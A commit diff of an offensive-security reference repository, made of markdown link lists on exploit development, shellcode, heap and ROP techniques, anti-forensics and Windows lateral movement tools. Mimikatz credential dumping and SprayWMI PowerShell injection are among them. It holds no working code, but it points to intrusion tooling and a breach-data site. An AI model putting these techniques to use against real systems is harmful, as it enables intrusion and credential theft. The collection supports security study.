* Shellphish's automated patching engine, originally created for the Cyber Grand Challenge.
[DotNetToJScript](https://github.com/tyranid/DotNetToJScript)
* A tool to create a JScript file which loads a .NET v2 assembly from memory.
[Code segment encryption](http://blog.sevagas.com/?Code-segment-encryption)
[Hello MS08-067, My Old Friend!](https://labs.mwrinfosecurity.com/assets/BlogFiles/hello-ms08-067-my-old-friend.pdf)
[Trampolines in x64](http://www.ragestorm.net/blogs/?p=107)
[AV_Kernel_Vulns](https://github.com/bee13oy/AV_Kernel_Vulns)
* Pocs for Antivirus Software‘s Kernel Vulnerabilities
[GEF](https://github.com/hugsy/gef)
* GEF is a kick-ass set of commands for X86, ARM, MIPS, PowerPC and SPARC to make GDB cool again for exploit dev. It is aimed to be used mostly by exploiters and reverse-engineers, to provide additional features to GDB using the Python API to assist during the process of dynamic analysis and exploit development.
[CVE-2016-7255 - Git repo](https://github.com/mwrlabs/CVE-2016-7255)
[MSRC-Security-Research Github](https://github.com/Microsoft/MSRC-Security-Research/tree/master/presentations)
[Playing with canaries](https://www.elttam.com.au/blog/playing-with-canaries/)
[MS17-010](https://github.com/worawit/MS17-010)
* Add use-after-free section
[ShellcodeStdio](https://github.com/jackullrich/ShellcodeStdio)
* An extensible framework for easily writing debuggable, compiler optimized, position independent, x86 shellcode for windows platforms.
[gdbgui](https://github.com/cs01/gdbgui)
* A modern, browser-based frontend to gdb (gnu debugger). Add breakpoints, view stack traces, and more in C, C++, Go, and Rust. Simply run gdbgui from the terminal and a new tab will open in your browser.
[I-know-where-your-page-lives](https://github.com/IOActive/I-know-where-your-page-lives)
* I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016
[Crashing phones with Wi-Fi: Exploiting nitayart's Broadpwn bug (CVE-2017-9417)](http://boosterok.com/blog/broadpwn2/)
[Sigreturn Oriented Programming is a real Threat](https://subs.emis.de/LNI/Proceedings/Proceedings259/2077.pdf)
* Abstract: This paper shows that Sigreturn Oriented Programming (SROP), which consists of using calls to sigreturn to execute arbitrary code, is a pow erful method for the de velopment of exploits. This is demonstrated by developing two different kinds of SROP based exploits, one asterisk exploit which was already portrayed in the paper presenting SROP, and one novel exploit for a recently disclosed bug inthe DNS address resolution of the default GNUC library. Taking advantage of the fact, that these exploits have very few dependencies on the program being exploited, a library is implemented to automate wide parts of SROP exploit creation. This highlights the potential of SROP in respect to reusable and portable exploit code which strongly supports the conclusion of the original paper: SROP is areal threat!
[Playing with signals : An overview on Sigreturn Oriented Programming](https://thisissecurity.net/2015/01/03/playing-with-signals-an-overview-on-sigreturn-oriented-programming/)
[SROP | Signals, you say?](https://0x00sec.org/t/srop-signals-you-say/2890)
[EnglishmansDentist Exploit Analysis](https://blogs.technet.microsoft.com/srd/2017/07/20/englishmansdentist-exploit-analysis/)
[Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom’s Wi-Fi Chipsets](https://blog.exodusintel.com/2017/07/26/broadpwn/)
[Breaking the links: Exploiting the linker](https://www.nth-dimension.org.uk/pub/BTL.pdf)
#### end sort
@ -126,7 +78,7 @@ Corelan Exploit Series
[Hacking FinSpy - a Case Study - Atilla Marosi - Troopers15](https://www.youtube.com/watch?v=Mb4mfBi06K4)
[A brief history of Exploitation - Devin Cook](http://www.irongeek.com/i.php?page=videos/derbycon4/t514-a-brief-history-of-exploitation-devin-cook)
@ -159,6 +111,14 @@ Corelan Exploit Series
[Return-Oriented Programming without Returns](https://www.cs.uic.edu/~s/papers/noret_ccs2010/noret_ccs2010.pdf)
[Code segment encryption](http://blog.sevagas.com/?Code-segment-encryption)
[Trampolines in x64](http://www.ragestorm.net/blogs/?p=107)
[Playing with canaries](https://www.elttam.com.au/blog/playing-with-canaries/)
[gargoyle, a memory scanning evasion technique](https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html)
@ -186,7 +146,6 @@ This will allow you to transfer EIP control to a specified offset within a file
[Stack Smashing Protector](http://wiki.osdev.org/Stack_Smashing_Protector)
[gargoyle, a memory scanning evasion technique](https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html)
[BinTut](https://github.com/NoviceLive/bintut)
* Dynamic or live demonstration of classical exploitation techniques of typical memory corruption vulnerabilities, from debugging to payload generation and exploitation, for educational purposes
@ -308,14 +267,17 @@ I have tried to order the articles by technique and chronology.
* [Defeating DEP, the Immunity Debugger way, Pablo Sole,2008](http://www.immunitysec.com/downloads/DEPLIB.pdf)
* [The Case of Return-Oriented Programming and the AVC Advantage, 2009](http://www.usenix.org/event/evtwote09/tech/full_papers/checkoway.pdf)
* [Practical Return-Oriented Programming, Dino A. Dai Zovi, 2010](http://www.sourceconference.com/bos10pubs/Dino.pdf)
[Blind Return Oriented Programming (BROP)](http://www.scs.stanford.edu/~sorbo/brop/)
##### Blind ROP
* [Blind Return Oriented Programming (BROP)](http://www.scs.stanford.edu/~sorbo/brop/)
* The BROP attack makes it possible to write exploits without possessing the target's binary. It requires a stack overflow and a service that restarts after a crash. Based on whether a service crashes or not (i.e., connection closes or stays open), the BROP attack is able to construct a full remote exploit that leads to a shell. The BROP attack remotely leaks enough gadgets to perform the write system call, after which the binary is transferred from memory to the attacker's socket. Following that, a standard ROP attack can be carried out. Apart from attacking proprietary services, BROP is very useful in targeting open-source software for which the particular binary used is not public (e.g., installed from source setups, Gentoo boxes, etc.). The attack completes within 4,000 requests (within minutes) when tested against a toy proprietary service, and real vulnerabilities in nginx and MySQL.
* [Hacking Blind - BROP paper](http://www.scs.stanford.edu/~sorbo/brop/bittau-brop.pdf)
* [Blind Return Oriented Programming](http://www.scs.stanford.edu/brop/)
* [Blind Return Oriented Programming (BROP) Attack (1)](http://ytliu.info/blog/2014/05/31/blind-return-oriented-programming-brop-attack-yi/)
* [Blind Return Oriented Programming (BROP) Attack (2)](http://ytliu.info/blog/2014/06/01/blind-return-oriented-programming-brop-attack-er/)
##### Signal ROP
* [Sigreturn Oriented Programming is a real Threat](https://subs.emis.de/LNI/Proceedings/Proceedings259/2077.pdf)
* [Playing with signals : An overview on Sigreturn Oriented Programming](https://thisissecurity.net/2015/01/03/playing-with-signals-an-overview-on-sigreturn-oriented-programming/)
* [SROP | Signals, you say?](https://0x00sec.org/t/srop-signals-you-say/2890)
### <a name="heap">Heap exploitation:</a>
------------------
@ -324,7 +286,7 @@ I have tried to order the articles by technique and chronology.
* [w00w00 on heap overflows, Matt Conover, 1999](http://w00w00.org/files/articles/heaptut.txt)
* [Vudo - An object superstitiously believed to embody magical powers, Michel "MaXX" Kaempf, 2001](http://www.phrack.com/issues.html?issue=57&id=8)
* [Once upon a free(), anonymous author, 2001\(http://www.phrack.com/issues.html?issue=57&id=9)
* [Once upon a free(), anonymous author, 2001](http://www.phrack.com/issues.html?issue=57&id=9)
* [Advanced Doug Lea's malloc exploits, jp, 2003](http://www.phrack.com/issues.html?issue=61&id=6)
* [Exploiting the wilderness, Phantasmal Phantasmagoria, 2004](http://www.derkeiler.com/Mailing-Lists/securityfocus/vuln-dev/2004-02/0024.html)
*[Malloc Maleficarum, Phantasmal Phantasmagoria, 2005](http://www.packetstormsecurity.org/papers/attack/MallocMaleficarum.txt)
@ -453,8 +415,11 @@ Other:
*
### <a name="uaf">Addendum: Use-After-Free</a>
------------------
* [An Introduction to Use After Free Vulnerabilities](https://www.purehacking.com/blog/lloyd-simon/an-introduction-to-use-after-free-vulnerabilities)
* [Exploit writing tutorial part 11 : Heap Spraying Demystified](https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/)
* [Part 9: Spraying the Heap [Chapter 2: Use-After-Free] – Finding a needle in a Haystack](https://www.fuzzysecurity.com/tutorials/expDev/11.html)
@ -474,13 +439,30 @@ Other:
[shellcode tutorials](http://projectshellcode.com/?q=node/12)
[rex](https://github.com/shellphish/rex)
* Shellphish's automated exploitation engine, originally created for the Cyber Grand Challenge.
[Patcherex](https://github.com/shellphish/patcherex)
* Shellphish's automated patching engine, originally created for the Cyber Grand Challenge.
[ShellcodeStdio](https://github.com/jackullrich/ShellcodeStdio)
* An extensible framework for easily writing debuggable, compiler optimized, position independent, x86 shellcode for windows platforms.
[Shellcode Time: Come on Grab Your Friends](http://www.irongeek.com/i.php?page=videos/derbycon4/t116-shellcode-time-come-on-grab-your-friends-wartortell)
* Packed shellcode is a common deterrent against reverse engineering. Mainstream software will use it in order to protect intellectual property or prevent software cracking. Malicious binaries and Capture the Flag (CTF) challenges employ packed shellcode to hide their intended functionality. However, creating these binaries is an involved process requiring significant experience with machine language. Due to the complexity of creating packed shellcode, the majority of samples are painstakingly custom-created or encoded with very simple mechanisms, such as a single byte XOR. In order to aid in the creation of packed shellcode and better understand how to reverse engineer it, I created a tool to generate samples of modular packed shellcode. During this talk, I will demonstrate the use of the shellcode creation tool and how to reverse engineer the binaries it creates. I will also demonstrate an automated process for unpacking the binaries that are created.
[Writing my first shellcode - iptables -P INPUT ACCEPT](https://0day.work/writing-my-first-shellcode-iptables-p-input-accept/)
Windows Kernel Shellcode on Windows 10
* [Windows Kernel Shellcode on Windows 10 – Part 1](https://improsec.com/blog//windows-kernel-shellcode-on-windows-10-part-1)
* [Windows Kernel Shellcode on Windows 10 – Part 2](https://improsec.com/blog//windows-kernel-shellcode-on-windows-10-part-2)
* [Windows Kernel Shellcode on Windows 10 – Part 3](https://improsec.com/blog//windows-kernel-shellcode-on-windows-10-part-3)
* [Windows Kernel Shellcode on Windows 10 – Part 4 - There is No Code](https://improsec.com/blog//windows-kernel-shellcode-on-windows-10-part-4-there-is-no-code)
Introduction to Windows Shellcode Development
* [Introduction to Windows shellcode development – Part 1](https://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/)
* [Introduction to Windows shellcode development – Part 2](https://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/)
* [Introduction to Windows shellcode development – Part 3](https://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/)
@ -515,6 +497,24 @@ AVM Fritz!Box root RCE: From Patch to Metasploit Module
[Tracking Down Heap Overflows with rr](https://sean.heelan.io/2016/05/31/tracking-down-heap-overflows-with-rr/)
[QuickZip Stack BOF 0day: a box of chocolates](https://www.corelan.be/index.php/2010/03/27/quickzip-stack-bof-0day-a-box-of-chocolates/)
##### Corelan
* [Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s[TM] Cube](https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/)
* [Exploit writing tutorial part 11 : Heap Spraying Demystified](https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/)
###### FuzzySecurity
* [Part 9: Spraying the Heap [Chapter 2: Use-After-Free] – Finding a needle in a Haystack](https://www.fuzzysecurity.com/tutorials/expDev/11.html)
@ -588,6 +588,11 @@ AVM Fritz!Box root RCE: From Patch to Metasploit Module
### <a name="obfus">Obfuscation</a>
[Obfuscating python](https://reverseengineering.stackexchange.com/questions/1943/what-are-the-techniques-and-tools-to-obfuscate-python-programs)
@ -742,6 +747,7 @@ https://www.exploit-db.com/docs/18482.pdf
[Proposed Windows 10 EAF/EMET "Bypass" for Reflective DLL Injection](https://zerosum0x0.blogspot.com/2017/06/proposed-eafemet-bypass-for-reflective.html?m=1)
[I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016](https://github.com/IOActive/I-know-where-your-page-lives)
@ -928,7 +934,8 @@ fREedom is a primitive attempt to provide an IDA Pro independent means of extrac
[sandbox-attacksurface-analysis-tools](https://github.com/google/sandbox-attacksurface-analysis-tools)
* This is a small suite of tools to test various properties of sandboxes on Windows. Many of the checking tools take a -p flag which is used to specify the PID of a sandboxed process. The tool will impersonate the token of that process and determine what access is allowed from that location. Also it's recommended to run these tools as an administrator or local system to ensure the system can be appropriately enumerated.
[DotNetToJScript](https://github.com/tyranid/DotNetToJScript)
* A tool to create a JScript file which loads a .NET v2 assembly from memory.
@ -990,6 +997,9 @@ fREedom is a primitive attempt to provide an IDA Pro independent means of extrac
[PEDA](https://github.com/longld/peda)
* PEDA - Python Exploit Development Assistance for GDB
[gdbgui](https://github.com/cs01/gdbgui)
* A modern, browser-based frontend to gdb (gnu debugger). Add breakpoints, view stack traces, and more in C, C++, Go, and Rust. Simply run gdbgui from the terminal and a new tab will open in your browser.
[GEF - GDB Enhanced Features](https://github.com/hugsy/gef)
* GEF is aimed to be used mostly by exploiters and reverse-engineers. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis or exploit development.
* Why not PEDA?
@ -1070,7 +1080,8 @@ Metasploit
[Anti-Virus Software Gone Wrong](http://uninformed.org/?v=all&a=21&t=sumry)
* Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default configuration of newly-sold computer systems. As a result, it is becoming increasingly important that anti-virus software be well-designed, secure by default, and interoperable with third-party applications. Software that is installed and running by default constitutes a prime target for attack and, as such, it is especially important that said software be designed with security and interoperability in mind. In particular, this article provides examples of issues found in well-known anti-virus products. These issues range from not properly validating input from an untrusted source (especially within the context of a kernel driver) to failing to conform to API contracts when hooking or implementing an intermediary between applications and the underlying APIs upon which they rely. For popular software, or software that is installed by default, errors of this sort can become a serious problem to both system stability and security. Beyond that, it can impact the ability of independent software vendors to deploy functioning software on end-user systems.
[Sigreturn Oriented Programming is a real Threat](https://subs.emis.de/LNI/Proceedings/Proceedings259/2077.pdf)
* Abstract: This paper shows that Sigreturn Oriented Programming (SROP), which consists of using calls to sigreturn to execute arbitrary code, is a pow erful method for the de velopment of exploits. This is demonstrated by developing two different kinds of SROP based exploits, one asterisk exploit which was already portrayed in the paper presenting SROP, and one novel exploit for a recently disclosed bug inthe DNS address resolution of the default GNUC library. Taking advantage of the fact, that these exploits have very few dependencies on the program being exploited, a library is implemented to automate wide parts of SROP exploit creation. This highlights the potential of SROP in respect to reusable and portable exploit code which strongly supports the conclusion of the original paper: SROP is areal threat!
@ -1163,9 +1174,16 @@ When run on a machine vulnerable to the rowhammer problem, the process was able
[The Weak Bug - Exploiting a Heap Overflow in VMware](http://acez.re/the-weak-bug-exploiting-a-heap-overflow-in-vmware/)
[Hello MS08-067, My Old Friend!](https://labs.mwrinfosecurity.com/assets/BlogFiles/hello-ms08-067-my-old-friend.pdf)
[Crashing phones with Wi-Fi: Exploiting nitayart's Broadpwn bug (CVE-2017-9417)](http://boosterok.com/blog/broadpwn2/)
[EnglishmansDentist Exploit Analysis](https://blogs.technet.microsoft.com/srd/2017/07/20/englishmansdentist-exploit-analysis/)
[Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom’s Wi-Fi Chipsets](https://blog.exodusintel.com/2017/07/26/broadpwn/)
[English Shellcode](http://web.cs.jhu.edu/~sam/ccs243-mason.pdf)
* History indicates that the security community commonly takes a divide-and-conquer approach to battling malware threats: identify the essential and inalienable components of an attack, then develop detection and prevention techniques that directly target one or more of the essential components. This abstraction is evident in much of the literature for buffer overflow attacks including, for instance, stack protection and NOP sled detection. It comes as no surprise then that we approach shellcode detection and prevention in a similar fashion. However, the common belief that components of polymorphic shellcode (e.g., the decoder) cannot reliably be hidden suggests a more implicit and broader assumption that continues to drive contemporary research: namely, that valid and complete representations of shellcode are fundamentally different in structure than benign payloads. While the first tenet of this assumption is philosoph- ically undeniable (i.e., a string of bytes is either shellcode or it is not), truth of the latter claim is less obvious if there exist encoding techniques capable of producing shellcode with features nearly indistinguishable from non-executable content. In this paper, we challenge the assumption that shellcode must conform to superficial and discernible representations. Specifically, we demonstrate a technique for automatically producing English Shellcode, transforming arbitrary shellcode into a representation that is superficially similar to English prose. The shellcode is completely self-contained - i.e., it does not require an external loader and executes as valid IA32 code)—and can typically be generated in under an hour on commodity hardware. Our primary objective in this paper is to promote discussion and stimulate new ideas for thinking ahead about preventive measures for tackling evolutions in code-injection attacks


Draft/Building A Pentest Lab/Lab Buffer Overflows.txt → Draft/Exploit_Dev_Lab.txt View File


+ 6
- 6
Draft/Forensics Incident Response.md View File

@ -20,22 +20,18 @@
* Better security - Mean time to detect/Mean time to respond
* Better security -> Mean time to detect/Mean time to respond
#### CULL
* Roll anti into this.
https://forensiccontrol.com/resources/free-software/
Forensics wiki
Yelp/Github - OSX Collector - Mass style forensics/management
hackingexposedcomputerforensicsblog.blogspot.com/2015/02/automating-dfir-how-to-series-on_21.html)
[THE CIDER PRESS:EXTRACTING FORENSIC ARTIFACTS FROM APPLE CONTINUITY](https://www.sans.org/summit-archives/file/summit-archive-1498146226.pdf)
#### End Cull
@ -268,8 +264,12 @@ http://windowsir.blogspot.com/2013/11/sniper-forensics-memory-analysis-and.html
[usbkill](https://github.com/stemid/usbkill)
* A tool that shuts down your computer if USB devices change, for example if you unplug or plug-in a device.
[An Anti-Forensics Primer - Jason Andress](http://www.irongeek.com/i.php?page=videos/derbycon3/s216-an-anti-forensics-primer-jason-andress)
* This talk will cover the basics of anti-forensics, the tools and techniques that can be used to make life harder for computer forensic examiners. We will cover some of the basic methods that are used (disk wiping, time stomping, encryption, etc…) and talk about which of these methods might actually work and which are easily surmounted with common forensic tools.
[OpenPuff Steganography](http://embeddedsw.net/OpenPuff_Steganography_Home.html)
[Forensics Impossible: Self-Destructing Thumb Drives - Brandon Wilson](https://www.youtube.com/watch?v=NRMqwc5YEu4)


+ 2
- 2
Draft/Fuzzing Bug Hunting.md View File

@ -51,8 +51,6 @@ https://raw.githubusercontent.com/secfigo/Awesome-Fuzzing/master/README.md
[Youtube Playlist of Fuzzing Videos](https://www.youtube.com/playlist?list=PLtPrYlwXDImiO_hzK7npBi4eKQQBgygLD)
### Blogposts
[Fools of Golden Gate](https://blog.silentsignal.eu/2017/05/08/fools-of-golden-gate/)
@ -173,6 +171,8 @@ https://raw.githubusercontent.com/secfigo/Awesome-Fuzzing/master/README.md
[Upping Your Bug Hunting Skills Using Symbolic Virtual Machines by Anto - x33fcon](https://www.youtube.com/watch?v=IPSZxGaLlyk)
[Practical File Format Fuzzing](http://www.irongeek.com/i.php?page=videos/derbycon3/3301-practical-file-format-fuzzing-jared-allar)
* File format fuzzing has been very fruitful at discovering exploitable vulnerabilities. Adversaries take advantage of these vulnerabilities to conduct spear-phishing attacks. This talk will cover the basics of file format fuzzing and show you how to use CERT’s fuzzing frameworks to discovery vulnerabilities in file parsers.


+ 2
- 1
Draft/Game Hacking.md View File

@ -20,6 +20,7 @@
http://douevenknow.us/post/151129092928/throwback-k9lhax-by-bruteforce
#### End Sort
#### Writeups
@ -31,7 +32,7 @@ http://douevenknow.us/post/151129092928/throwback-k9lhax-by-bruteforce
[Remote Code Execution In Source Games](https://oneupsecurity.com/research/remote-code-execution-in-source-games?t=r)
[Gotta catch-em-all worldwide - Pokemon GO GPS spoofing](https://insinuator.net/2016/07/gotta-catch-em-all-worldwide-or-how-to-spoof-gps-to-cheat-at-pokemon-go/)
### Console Hacking


Draft/Interesting Things Useful stuff/Writeup of Gamma Group Hack.txt → Draft/Gamma_group_hack_writeup.txt View File


+ 17
- 23
Draft/Interesting Things Useful stuff.md View File

@ -40,28 +40,12 @@ http://spth.virii.lu/articles.htm
[303 Hacks Lies Nation States Mario DiNatale](https://www.youtube.com/watch?v=nyh_ORq1Qwk)
[Richard Thieme - The Impact of Dark Knowledge and Secrets on Security and Intelligence Professionals](https://www.youtube.com/watch?v=0MzcPBAj88A&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe)
* Dismissing or laughing off concerns about what it does to a person to know critical secrets does not lessen the impact on life, work, and relationships of building a different map of reality than “normal people” use. One has to calibrate narratives to what another believes. One has to live defensively, warily. This causes at the least cognitive dissonance which some manage by denial. But refusing to feel the pain does not make it go away. It just intensifies the consequences when they erupt.
Philip K. Dick said, reality is that which, when you no longer believe in it, does not go away. When cognitive dissonance evolves into symptoms of traumatic stress, one ignores those symptoms at one’s peril. But the very constraints of one’s work often make it impossible to speak aloud about those symptoms, because that might threaten one’s clearances, work, and career. And whistle blower protection is often non-existent.
[recap](https://github.com/rackerlabs/recap)
* recap is a reporting script that generates reports of various information about the server.
[Paul Rascagneres - Modern Reconnaissance Phase by APT – Protection Layer](https://www.youtube.com/watch?v=4JVrK7bRKb0&index=10&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe)
[BE YOUR OWN VPN PROVIDER WITH OPENBSD (v2)](https://networkfilter.blogspot.com/2017/04/be-your-own-vpn-provider-with-openbsd-v2.html)
[New cache architecture on Intel I9 and Skylake server: An initial assessment](https://cyber.wtf/2017/07/18/new-cache-architecture-on-intel-i9-and-skylake-server-an-initial-assessment/)
[301 The Road to Hiring is Paved in Good Intentions Tim OBrien](https://www.youtube.com/watch?v=sdkf8SIj1rU)
[Ermahgerd: Lawrs - Robert Heverly - Anycon17](http://www.irongeek.com/i.php?page=videos/anycon2017/305-ermahgerd-lawrs-prof-robert-heverly)
* When do you ? and other coders, hackers, developers, and tinkerers ? think or worry about the law? If your answer is, ?Not very often,? then this talk is for you. We all need to think about the law. And it?s not just privacy, or computer fraud, or even anti-circumvention law, that we should think about. We need to think about law as a whole and how it can help us do or stop us from doing what we want to do. This talk will start with a broad overview of the ways in which we implicate law when we do what we do, and then will focus on what that means for us and the broader implications that can arise from our various activities. Do you think the law would stop you from doing what you want to do or punish you for doing it? It might, but it also might not. If you think it does, do you think you should be able to do what you want to do? If you do, then we need to hack the law, and to do that we?ll need to talk to the legal coders, those writers of our cultural software. This talk will tackle not only law and working with code, but also why it matters for us to be aware of the law and engaged in improving it.
[QR Code interesting](http://datagenetics.com/blog/november12013/index.html)
[Manuals Library](https://www.manualslib.com/)
@ -70,14 +54,8 @@ Philip K. Dick said, reality is that which, when you no longer believe in it, do
[IA Guidance - NSA](https://www.iad.gov/iad/library/ia-guidance/index.cfm)
[LeakedSource.ru](https://leakedsource.ru/)
#### End Sort
@ -249,6 +227,22 @@ http://www.securitywizardry.com/radar.htm
[Software Supply Chains and the Illusion of Control - Derek Weeks](http://www.irongeek.com/i.php?page=videos/bsidesnova2017/107-software-supply-chains-and-the-illusion-of-control-derek-weeks)
* In this presentation I am sharing the results of a three-year, industry-wide study on open source development and security practices across 3,000 organizations and 25,000. I will detail how these organizations are employing a vast community of open source component suppliers, warehouses, and development tools that take the form of software supply chains. Modern software development practices are now consuming BILLIONS of open source and third-party components. The tooling with package managers and build tools such as Maven, Gradle, npm, NuGet, RubyGems and others has promoted the usage of components to a convenient standard practice. As a result, 90% of a typical application is now composed of open source components. The good news: use of the components is improving developer productivity and accelerating time to market. However, using these components brings ownership and responsibility with it and this fact is largely overlooked. The unspoken truth: not all parts are created equal. For example, 1 in 16 components in use include known security vulnerabilities. Ugh. This session aims to enlighten development professionals by sharing results from the State of the Software Supply Chain reports from 2015 through 2017. The reports blend of public and proprietary data with expert research and analysis. Attendees in this session will learn: - What our analysis of 25,000 applications reveals about the quality and security of software built with open source components - How organizations like Mayo Clinic, Exxon, Capital One, the U.S. FDA and Intuit are utilizing the principles of software supply chain automation to improve application security - Why avoiding open source components over 3 years old might be a really good idea - How to balance the need for speed with quality and security -- early in the development lifecycle We will also discuss how you can best approach the effort for development teams to identify, track and replace components with known vulnerabilities, while getting more products and new features to market quickly. Attend this session and gain insight as to how your organization’s application development practices compare to others. I'll share the industry benchmarks to take back and discuss with your development, security, and open source governance teams.
[303 Hacks Lies Nation States Mario DiNatale](https://www.youtube.com/watch?v=nyh_ORq1Qwk)
[Paul Rascagneres - Modern Reconnaissance Phase by APT – Protection Layer](https://www.youtube.com/watch?v=4JVrK7bRKb0&index=10&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe)
[BE YOUR OWN VPN PROVIDER WITH OPENBSD (v2)](https://networkfilter.blogspot.com/2017/04/be-your-own-vpn-provider-with-openbsd-v2.html)
[New cache architecture on Intel I9 and Skylake server: An initial assessment](https://cyber.wtf/2017/07/18/new-cache-architecture-on-intel-i9-and-skylake-server-an-initial-assessment/)
[301 The Road to Hiring is Paved in Good Intentions Tim OBrien](https://www.youtube.com/watch?v=sdkf8SIj1rU)
[Ermahgerd: Lawrs - Robert Heverly - Anycon17](http://www.irongeek.com/i.php?page=videos/anycon2017/305-ermahgerd-lawrs-prof-robert-heverly)
* When do you ? and other coders, hackers, developers, and tinkerers ? think or worry about the law? If your answer is, ?Not very often,? then this talk is for you. We all need to think about the law. And it?s not just privacy, or computer fraud, or even anti-circumvention law, that we should think about. We need to think about law as a whole and how it can help us do or stop us from doing what we want to do. This talk will start with a broad overview of the ways in which we implicate law when we do what we do, and then will focus on what that means for us and the broader implications that can arise from our various activities. Do you think the law would stop you from doing what you want to do or punish you for doing it? It might, but it also might not. If you think it does, do you think you should be able to do what you want to do? If you do, then we need to hack the law, and to do that we?ll need to talk to the legal coders, those writers of our cultural software. This talk will tackle not only law and working with code, but also why it matters for us to be aware of the law and engaged in improving it.
[Richard Thieme - The Impact of Dark Knowledge and Secrets on Security and Intelligence Professionals](https://www.youtube.com/watch?v=0MzcPBAj88A&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe)
* Dismissing or laughing off concerns about what it does to a person to know critical secrets does not lessen the impact on life, work, and relationships of building a different map of reality than “normal people” use. One has to calibrate narratives to what another believes. One has to live defensively, warily. This causes at the least cognitive dissonance which some manage by denial. But refusing to feel the pain does not make it go away. It just intensifies the consequences when they erupt.
Philip K. Dick said, reality is that which, when you no longer believe in it, does not go away. When cognitive dissonance evolves into symptoms of traumatic stress, one ignores those symptoms at one’s peril. But the very constraints of one’s work often make it impossible to speak aloud about those symptoms, because that might threaten one’s clearances, work, and career. And whistle blower protection is often non-existent.


Draft/Exploit Development/Lab for Practicing Exploit Writing.txt → Draft/Lab for Practicing Exploit Writing.txt View File


+ 175
- 142
Draft/Network Attacks & Defenses.md View File

@ -24,25 +24,17 @@ TOC
##### To be sorted
http://www.pentest-standard.org/index.php/Intelligence_Gathering
[PiTap](https://github.com/williamknows/PiTap)
* Automatic bridge creation and packet capture (plug-and-capture) on a battery-powered Raspberry Pi with multiple network interfaces.
* [Blogpost]()
[RFC 2827 - Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing](https://tools.ietf.org/html/rfc2827)
[bluebox-ng](https://github.com/jesusprubio/bluebox-ng)
* Pentesting framework using Node.js powers, focused in VoIP.
[SIMPLYEMAIL](https://github.com/killswitch-GUI/SimplyEmail)
* What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.
[Scanning Effectively Through a SOCKS Pivot with Nmap and Proxychains](https://cybersyndicates.com/2015/12/nmap-and-proxychains-scanning-through-a-socks-piviot/)
* [Script](https://github.com/killswitch-GUI/PenTesting-Scripts/blob/master/Proxychains-Nmap.py)
##### sort end
###### To Do
* Sort Scanners into sections
* Active Directory Section?
@ -80,7 +72,7 @@ http://www.pentest-standard.org/index.php/Intelligence_Gathering
[STP MiTM Attack and L2 Mitigation Techniques on the Cisco Catalyst 6500 ](http://www.ndm.net/ips/pdf/cisco/Catalyst-6500/white_paper_c11_605972.pdf)
[RFC 2827 - Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing](https://tools.ietf.org/html/rfc2827)
@ -89,17 +81,19 @@ http://www.pentest-standard.org/index.php/Intelligence_Gathering
### <a name="attackw">Attacking Windows Networks</a>
[ *Puff* *Puff* PSExec - Lateral Movement: An Overview](https://www.toshellandback.com/2017/02/11/psexec/)
[Introducing PowerShell into your Arsenal with PS>Attack - Jared Haight](http://www.irongeek.com/i.php?page=videos/derbycon6/119-introducing-powershell-into-your-arsenal-with-psattack-jared-haight)
[Ditch PsExec, SprayWMI is here ;)](http://www.pentest.guru/index.php/2015/10/19/ditch-psexec-spraywmi-is-here/)
[Windows Attacks AT is the new black](https://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607)
#### Movement
[*Puff* *Puff* PSExec - Lateral Movement: An Overview](https://www.toshellandback.com/2017/02/11/psexec/)
[Ditch PsExec, SprayWMI is here ;)](http://www.pentest.guru/index.php/2015/10/19/ditch-psexec-spraywmi-is-here/)
[WMIOps](https://github.com/ChrisTruncer/WMIOps)
* WMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment. It's designed primarily for use on penetration tests or red team engagements.
[Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2](http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/)
[spraywmi](https://github.com/trustedsec/spraywmi)
* SprayWMI is a method for mass spraying Unicorn PowerShell injection to CIDR notations.
@ -107,131 +101,88 @@ http://www.pentest-standard.org/index.php/Intelligence_Gathering
* A rapid psexec style attack with samba tools
* [Blogpost that inspired it](http://carnal0wnage.attackresearch.com/2012/01/psexec-fail-upload-and-exec-instead.html)
[Sparty - MS Sharepoint and Frontpage Auditing Tool](http://sparty.secniche.org/)
* Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.
[sshuttle](https://github.com/apenwarr/sshuttle)
* Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
[Responder](https://github.com/SpiderLabs/Responder/)
